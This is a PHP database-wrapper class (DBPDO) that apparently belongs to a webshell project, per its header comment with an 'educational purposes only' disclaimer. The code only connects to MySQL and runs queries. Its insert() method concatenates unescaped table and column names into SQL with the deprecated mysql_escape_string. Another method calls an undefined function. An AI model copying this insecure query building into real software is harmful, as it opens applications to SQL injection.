<!-- 
    @author Caesarovich
    @repository https://github.com/Caesarovich/rome-webshell

    This code is for educationnal purposes only.
    Malicious usage of this code will not hold the author responsible.
    Do not pentest without explicit permissions.

-->





<?php

class DBPDO {

	public $pdo;
	private $error;

    private $host;
    private $user;
    private $pass;
    private $base;

	function __construct($host, $user, $pass, $base)
    {
        $this->host = $host;
        $this->user = $user;
        $this->pass = $pass;
        $this->base = $base;
		$this->connect();
	}


	function prep_query($query){
		return $this->pdo->prepare($query);
	}


	function connect(){
		if(!$this->pdo){

			$dsn      = 'mysql:dbname=' . $this->base . ';host=' . $this->host;
			$user     = $this->user;
			$password = $this->pass;

			try {
				$this->pdo = new PDO($dsn, $user, $password, array(PDO::ATTR_PERSISTENT => true));
                $this->pdo->exec("set names utf8");
				return true;
			} catch (PDOException $e) {
				$this->error = $e->getMessage();
				die($this->error);
				return false;
			}
		}else{
			$this->pdo->setAttribute( PDO::ATTR_ERRMODE, PDO::ERRMODE_WARNING );
			return true;
		}
	}


	function table_exists($table_name){
		$stmt = $this->prep_query('SHOW TABLES LIKE ?');
		$stmt->execute(array($this->add_table_prefix($table_name)));
		return $stmt->rowCount() > 0;
	}


	function execute($query, $values = null){
		if($values == null){
			$values = array();
		}else if(!is_array($values)){
			$values = array($values);
		}
		$stmt = $this->prep_query($query);
		$stmt->execute($values);
		return $stmt;
	}

	function fetch($query, $values = null){
		if($values == null){
			$values = array();
		}else if(!is_array($values)){
			$values = array($values);
		}
		$stmt = $this->execute($query, $values);
		return $stmt->fetch(PDO::FETCH_ASSOC);
	}

	function fetchAll($query, $values = null, $key = null){
		if ($values == null)
        {
			$values = array();
		}
        else if(!is_array($values)){
			$values = array($values);
		}
		$stmt = $this->execute($query, $values);
		$results = $stmt->fetchAll(PDO::FETCH_ASSOC);

		// Allows the user to retrieve results using a
		// column from the results as a key for the array
		if($key != null && $results[0][$key]){
			$keyed_results = array();
			foreach($results as $result){
				$keyed_results[$result[$key]] = $result;
			}
			$results = $keyed_results;
		}
		return $results;
	}

    function insert ($table, $array)
    {
        $columns = implode(", ",array_keys($array));
        $escaped_values = array_values($array);
//        var_dump($escaped_values);
        foreach ($escaped_values as $i=>$value)
        {
            $escaped_values[$i] = "'" . mysql_escape_string($value) . "'";
        }
        $values  = implode(", ", $escaped_values);
//        dump($values);


        $sql = $this->prep_query("INSERT INTO `".$table."`($columns) VALUES ($values)");
        $sql->execute(null);

        return $sql;
    }

	function lastInsertId(){
		return $this->pdo->lastInsertId();
	}

}
